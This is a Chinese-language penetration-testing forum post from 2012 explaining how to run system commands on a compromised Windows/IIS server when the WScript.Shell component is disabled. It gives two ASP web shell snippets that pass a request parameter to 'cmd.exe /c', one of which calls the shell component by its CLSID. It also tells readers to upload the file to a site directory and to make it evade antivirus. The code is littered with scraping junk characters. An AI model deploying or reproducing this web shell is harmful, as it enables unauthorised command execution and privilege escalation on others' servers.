找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
返回列表 发新帖
查看: 3493|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。6 e& E1 g  D+ l0 {- z& @
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
    + Y; n6 C: z' v6 c
  • 要想让运行命令可以试试这种方法,成功率为五五之数。$ ]) S* r% U- ~# u/ |( |& v& Z
  • 把下面代码复制:. }- j7 d# w" A+ Q# @7 Y: l
  • <%  _0 D0 v. r2 i5 x2 F' e+ I1 _
  • end if
    ( A) R( g( e2 R8 c
  • response.write(”")
    : l1 \9 c' T3 z( @1 z
  • On Error Resume
    + }/ \% K/ ~. |% Z# V, s
  • Next
      W9 R: X! f  P' U2 I
  • response.write oScriptlhn.exec(”cmd.exe /c” & ' U' d1 d5 x# Q) H/ \
  • request(”c”)).stdout.readall
    1 f- ]  C, L, l$ o6 q* o+ O
  • response.write(”")3 L  v* }8 Q# M) c
  • response.write(”")" ]3 \. e5 `* N8 g: z8 A) x- @
  • response.write(”4 V$ J- r+ y. g" K* r
  • “)
    # Y6 _% L5 P' `: Z  F% H
  • response.write(”"), g2 ^# F4 P. J) X2 }" W
  • %>
    $ s5 C- N' y( p# s& A# J3 i$ n
  • 保存为一个asp文件,然后传到网站目录上去
    & @/ I( t, d5 X
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。; x7 z4 U- A5 @  {* W
  • 我用此成功运行过cacls命令。+ i% {% E5 E; k' E% C2 G, `5 @
  • 第二那就是运行时出错,可能限制某些代码执行
    # O3 i5 [8 @6 \: h" L/ f, x+ Q
  • 无wscript.shell组件提权又一个方法& w9 O5 y/ l2 {( ]3 M9 H, |
  • <object runat=server id=oScriptlhn scope=page
    3 u& t: D: Z+ ~' c- C$ H

  • & Z6 A5 b: _0 O0 q
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
    ) @' \5 r& q) N, H) e! C
  • <%if err then%>
    1 V/ u( o7 b, g
  • <object runat=server id=oScriptlhn scope=page 4 H2 z" r( [3 D/ G& ^( ?9 J
  • 9 [  ^' A6 U1 e5 k! F0 o, D; w
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>. u# u; K: O0 }: _
  • <%
    % y7 d4 D; `$ s' P- y  o
  • end if
    8 A, d7 L0 p3 u! U
  • response.write(”<textarea readonly cols=80   r1 t; @* G" c6 E2 n; g

  • $ \. P8 ~' ], Q' `6 f
  • rows=20>”) 7 Q2 _' L5 C" H  Q
  • On Error Resume Next
    ' d& m9 j& R3 d3 P- ^& Q- l
  • response.write
    0 d% [3 f4 u# C1 U
  • 5 f1 ], _- T+ t4 p" z& n$ v$ h
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    : j: g1 G- v! V
  • response.write(”</textarea>”)   w, D3 c% J5 }$ W; Q% Y
  • response.write(”<form
    0 |" _; q5 ~2 _$ d5 P; ?9 b" x

  • 8 p# Q9 G) X% W  r  e
  • method=’post’>”)
    4 V" ~! ^! f- b. z( r
  • response.write(”<input type=text name=’c'
    4 h9 I! A( X1 Z6 D2 ?) o
  • + ^+ J/ n4 g- l
  • size=60><br>”)
    4 |; Y/ W0 I6 b- \0 i* L
  • response.write(”<input type=submit ! M" v* K' `3 ?  U. ?/ f- g

  • 1 Z0 R. B9 \$ @: E- Z1 a
  • value=’执行’></form>”) . k- W9 k* b# n+ p* Z  ]
  • %>
    & F7 a# }) V5 M, N$ X% {
  • 保存为ASP,此代码可能被杀,请注意免杀。
    ; M- y( [! \/ b
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
    ) H* ~3 b& \7 @' t+ O, D: `% Y
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表